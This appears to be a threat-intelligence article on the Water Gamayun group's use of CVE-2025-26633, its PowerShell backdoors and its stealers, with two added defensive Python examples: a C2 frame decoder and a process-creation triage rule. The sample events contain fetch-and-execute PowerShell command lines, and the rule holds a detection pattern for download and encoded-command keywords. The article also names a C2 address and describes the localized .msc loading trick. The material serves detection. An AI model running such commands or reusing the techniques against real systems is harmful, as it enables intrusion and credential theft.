CVE-2025-26633 Vulnerability
Water Gamayun has been actively exploiting CVE-2025-26633 (dubbed MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework, to execute malware via rogue Microsoft Console (.msc) files. Microsoft classifies the flaw as a security feature bypass and fixed it in the March 2025 Patch Tuesday release; the group was exploiting it before the fix shipped, so any host that has not taken that update remains exposed.
New Backdoors: SilentPrism and DarkWisp
The actor behind these zero-day attacks has deployed two backdoors, SilentPrism and DarkWisp. Both provide persistence, system reconnaissance and remote control, which makes them well suited to espionage and data theft. The operation has been attributed to a suspected Russian-linked group tracked as Water Gamayun, also known as EncryptHub and LARVA-208.
Attack Methods: Provisioning Packages and MSI Installers
Water Gamayun primarily delivers payloads through malicious provisioning packages (.ppkg), signed .msi installers and .msc files. It also proxies command execution through runnerw.exe, a legitimate IntelliJ IDEA helper binary, so that the resulting process tree looks like developer tooling rather than malware.
The Evolution of EncryptHub’s Malware Distribution
EncryptHub first gained attention in June 2024, when it used a GitHub repository to distribute various malware families via a fake WinRAR website. It has since moved to infrastructure it controls for both payload staging and Command-and-Control (C&C).
Masquerading as Legitimate Software
Water Gamayun hides its malware inside .msi installers posing as legitimate applications such as DingTalk, QQTalk and VooV Meeting. The installers run a PowerShell downloader that fetches and executes the next-stage payloads on the compromised system.
SilentPrism and DarkWisp: Stealthy PowerShell Implants
SilentPrism is a PowerShell-based implant that establishes persistence, executes multiple shell commands, and evades detection using anti-analysis techniques.
DarkWisp, another PowerShell backdoor, specializes in system reconnaissance, data exfiltration, and maintaining long-term access to infected machines.
C&C Communication and Command Execution
Once running, the backdoor sends its reconnaissance data to the C&C server and enters a loop, waiting for operator commands over TCP port 8080. Commands arrive as COMMAND|<base64_encoded_command>, giving the operator an ongoing interactive channel to the victim's system. For defenders, the combination of a fixed port and a fixed frame prefix is a usable network signature, provided the base64 payload is actually decoded rather than matched blindly.
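The following is an added example, not code from the original article or from any analysis of the malware itself: a small parser that pulls COMMAND|<base64> frames out of a captured TCP/8080 byte stream and decodes them strictly, so malformed or padded-out frames are reported instead of silently decoding to junk. The sample stream is constructed for this example (the two valid payloads decode to "whoami /all" and "hostname"); the actual inner commands the group sends, and how they are encoded, are not specified on this page, so the decoded payload is kept as raw bytes.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of an operator-to-victim stream using the
# COMMAND|<base64> frame shape described in the text. The last two frames are
# deliberately malformed. This is not real captured traffic.
SAMPLE_STREAM = b"""COMMAND|d2hvYW1pIC9hbGw=
HEARTBEAT
COMMAND|aG9zdG5hbWU=
COMMAND|not*base64*
COMMAND|QUJ
"""

# Match the prefix only; the payload is validated by the decoder, so an analyst
# also sees *attempted* command frames that fail to decode.
_FRAME_RE = re.compile(rb"^COMMAND\|(.+)$")


@dataclass
class C2Frame:
    raw: bytes                 # the frame as it appeared on the wire
    decoded: Optional[bytes]   # decoded payload, or None if the base64 was invalid


def parse_frame(line: bytes) -> Optional[C2Frame]:
    """Return a C2Frame if `line` is a COMMAND|<base64> frame, otherwise None."""
    line = line.strip()
    m = _FRAME_RE.match(line)
    if m is None:
        return None
    try:
        # validate=True rejects non-alphabet bytes instead of discarding them;
        # without it, junk such as "not*base64*" could decode to something
        # plausible-looking and hide a broken or evasive frame.
        decoded = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:          # non-alphabet bytes or incorrect padding
        decoded = None
    return C2Frame(raw=line, decoded=decoded)


def extract_frames(stream: bytes) -> list[C2Frame]:
    """Split a captured byte stream into lines and keep only COMMAND frames."""
    frames = []
    for line in stream.splitlines():
        frame = parse_frame(line)
        if frame is not None:
            frames.append(frame)
    return frames


def decoded_commands(stream: bytes) -> list[str]:
    """Human-readable view of the frames that decoded successfully."""
    return [f.decoded.decode("utf-8", errors="replace")
            for f in extract_frames(stream) if f.decoded is not None]


if __name__ == "__main__":
    for frame in extract_frames(SAMPLE_STREAM):
        status = "ok" if frame.decoded is not None else "MALFORMED"
        print(f"{status:9} {frame.raw.decode(errors='replace')} -> {frame.decoded!r}")
```

Feed it the reassembled server-to-client side of a TCP/8080 session (for example, the payload bytes from a packet capture) and the non-COMMAND lines such as heartbeats are ignored. Because PowerShell's own -EncodedCommand convention is base64 of UTF-16LE text, a production version would try several text encodings on the decoded bytes before deciding a payload is unreadable.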
MSC EvilTwin Loader: Deploying the Rhadamanthys Stealer
One of the most concerning payloads in this attack chain is the MSC EvilTwin loader, which exploits CVE-2025-26633 to execute malicious .msc files. The loader abuses the way MMC resolves localized console files: a clean .msc is dropped alongside a malicious copy of the same name in an en-US subfolder, and mmc.exe loads the localized copy. The chain ultimately deploys the Rhadamanthys Stealer, a well-known information stealer.
Expanding the Arsenal: More Stealers and Custom Variants
Water Gamayun doesn't rely solely on Rhadamanthys. It also distributes StealC and three custom PowerShell-based stealers, EncryptHub Stealer variants A, B and C. Built on the open-source Kematian Stealer, these variants collect extensive system data, including installed anti-malware products, installed software, network configuration and running applications.
Targeting Cryptocurrency and Sensitive Data
The stealers gather a wide range of credentials and secrets, including Wi-Fi passwords, Windows product keys, browser data and clipboard history. Notably, they search explicitly for files related to cryptocurrency wallets, indicating an intent to harvest recovery phrases and drain funds.
Living-off-the-Land Techniques for Stealth
A distinctive feature of one EncryptHub Stealer variant is its use of a living-off-the-land binary (LOLBin). It leverages IntelliJ's runnerw.exe to proxy the execution of remote PowerShell scripts, so the script launch appears to come from a legitimate development tool rather than from the malware. In process telemetry this surfaces as runnerw.exe spawning powershell.exe, a parent-child pairing that is worth alerting on when the command line also fetches content from a URL or carries an encoded command.
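As an added example (not code from the article or from any vendor detection content), here is a triage rule over constructed process-creation records in the shape of Sysmon Event ID 1 (ParentImage, Image, CommandLine). The only fact taken from the text is the runnerw.exe-launches-PowerShell pattern; the file paths, command lines and the set of "remote fetch or encoded command" indicators are assumptions chosen for illustration and should be tuned to the environment.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed Sysmon-style process-creation records. Paths and command lines are
# invented for this example; "aQBlAHgA" is the base64 of UTF-16LE "iex".
SAMPLE_EVENTS = [
    {"EventId": "e1",
     "ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "iex (iwr http://example.invalid/s.ps1)"'},
    {"EventId": "e2",      # normal IDE use: runnerw.exe launching the JVM
     "ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "Image": r"C:\Program Files\JetBrains\IntelliJ IDEA\jbr\bin\java.exe",
     "CommandLine": "java -cp build\\classes com.example.Main"},
    {"EventId": "e3",      # PowerShell, but not proxied through runnerw.exe
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Date"},
    {"EventId": "e4",      # copy of runnerw.exe outside the IDE directory, encoded command
     "ParentImage": r"C:\Users\dev\AppData\Local\runnerw.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -enc aQBlAHgA"},
    {"EventId": "e5",      # runnerw.exe -> PowerShell with a plain local script
     "ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File .\build.ps1"},
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed indicators that the child is fetching its script remotely or hiding it.
REMOTE_OR_OBFUSCATED = re.compile(
    r"https?://|downloadstring|downloadfile|\biwr\b|invoke-webrequest|\birm\b|"
    r"invoke-restmethod|\biex\b|invoke-expression|-e(nc(odedcommand)?)?\b|frombase64string",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    event_id: str
    severity: str   # "high" or "review"
    reason: str


def triage_event(evt: dict) -> Optional[Finding]:
    """Flag runnerw.exe spawning PowerShell; escalate on remote/encoded command lines."""
    parent = basename(evt["ParentImage"])
    child = basename(evt["Image"])
    if parent != "runnerw.exe" or child not in POWERSHELL_IMAGES:
        return None
    if REMOTE_OR_OBFUSCATED.search(evt["CommandLine"]):
        return Finding(evt["EventId"], "high",
                       "runnerw.exe -> PowerShell with remote fetch or encoded command")
    # A developer running a PowerShell run configuration can produce this pairing,
    # so a plain local script is surfaced for review rather than as an alert.
    return Finding(evt["EventId"], "review", "runnerw.exe -> PowerShell")


def triage(events: list[dict]) -> list[Finding]:
    return [f for f in (triage_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.event_id}: {f.reason}")
```

The parent match is on the file name alone on purpose: e4 shows a copy of runnerw.exe outside the IDE directory, which is exactly the case a path-anchored rule would miss. Pairing this with a check that the runnerw.exe image is signed by JetBrains and lives under the IDE's install path separates dropped copies from the real helper.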
Propagating Malware through Multiple Channels
Water Gamayun's malicious MSI packages and binary droppers have also been observed distributing additional malware families, including Lumma Stealer, Amadey and various cryptocurrency-focused clippers.
C&C Infrastructure: Remote Control via PowerShell
Analysis of Water Gamayun's C&C infrastructure (notably 82.115.223[.]182) shows that it uses PowerShell scripts to download and execute AnyDesk for remote access. It also pushes Base64-encoded commands to victim machines, giving the operator interactive control over the host.
Adaptive and Persistent: Water Gamayun’s Threat Landscape
Water Gamayun's use of multiple attack vectors, including signed MSI files, LOLBins and custom payloads, highlights its adaptability in breaching systems. Its C&C infrastructure lets it maintain long-term access while complicating forensic investigation.
